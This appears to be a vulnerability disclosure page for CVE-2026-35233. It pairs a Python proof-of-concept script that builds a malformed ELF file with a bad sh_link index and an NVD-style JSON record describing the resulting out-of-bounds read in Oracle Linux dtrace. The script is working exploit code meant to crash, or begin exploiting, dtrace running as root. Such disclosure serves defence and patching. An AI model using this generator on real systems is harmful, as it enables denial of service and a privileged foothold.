CVE-2026-35233

import struct # Create a minimal malicious ELF to trigger the sh_link out-of-bounds read # This is a conceptual PoC generator. def create_malicious_elf(filename): # ELF Header (64-bit) e_ident = b'\x7fELF\x02\x01\x01\x00' + b'\x00'*9 e_type = struct.pack('<H', 2) # ET_EXEC e_machine = struct.pack('<H', 62) # x86-64 e_version = struct.pack('<I', 1) e_entry = struct.pack('<Q', 0x400000) e_phoff = struct.pack('<Q', 64) e_shoff = struct.pack('<Q', 64) # Section header offset e_flags = struct.pack('<I', 0) e_ehsize = struct.pack('<H', 64) e_phentsize = struct.pack('<H', 56) e_phnum = struct.pack('<H', 0) e_shentsize = struct.pack('<H', 64) e_shnum = struct.pack('<H', 1) # Only 1 section header e_shstrndx = struct.pack('<H', 0) elf_header = e_ident + e_type + e_machine + e_version + e_entry + e_phoff + \ e_shoff + e_flags + e_ehsize + e_phentsize + e_phnum + \ e_shentsize + e_shnum + e_shstrndx # Section Header (corrupt sh_link) # sh_link is set to a large value (e.g., 0xFFFF) to cause out-of-bounds read sh_name = struct.pack('<I', 0) sh_type = struct.pack('<I', 1) # SHT_PROGBITS sh_flags = struct.pack('<Q', 0) sh_addr = struct.pack('<Q', 0) sh_offset = struct.pack('<Q', 0) sh_size = struct.pack('<Q', 0) sh_link = struct.pack('<I', 0xFFFF) # MALICIOUS: Out of range index sh_info = struct.pack('<I', 0) sh_addralign = struct.pack('<Q', 0) sh_entsize = struct.pack('<Q', 0) section_header = sh_name + sh_type + sh_flags + sh_addr + sh_offset + \ sh_size + sh_link + sh_info + sh_addralign + sh_entsize with open(filename, 'wb') as f: f.write(elf_header) f.write(section_header) print(f"Malicious ELF '{filename}' created. Run it and attach dtrace as root to trigger.") if __name__ == "__main__": create_malicious_elf("malicious_elf")

{"cve": {"id": "CVE-2026-35233", "sourceIdentifier": "[email protected]", "published": "2026-05-01T18:16:14.647", "lastModified": "2026-05-05T17:46:30.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unprivileged attacker can craft a user-space process with a malicious ELF binary containing an out-of-range sh_link field. When root-level dtrace attaches to -- or instruments -- that process (via dtrace -p , pid probes, or USDT), the ELF parser reads heap memory beyond the allocated section cache array without any bounds check. This results in an uninitialized/out-of-bounds heap read that can cause a NULL pointer dereference crash of the dtrace process (DoS), or -- depending on heap layout -- a read-then-use of a garbage pointer controlled by adjacent allocations, providing a foothold toward further exploitation in a privileged context."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:8:-:*:*:*:*:*:*", "matchCriteriaId": "CA9021D6-6027-42E9-A12D-7EA32C5C63F1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:9:0:*:*:*:*:*:*", "matchCriteriaId": "C848CA1D-A42D-4AF1-9D95-E6268F9C1880"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:10:0:*:*:*:*:*:*", "matchCriteriaId": "1F606DC6-31B5-4102-B174-D565662C4829"}]}]}], "references": [{"url": "https://linux.oracle.com/cve/CVE-2026-35233.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}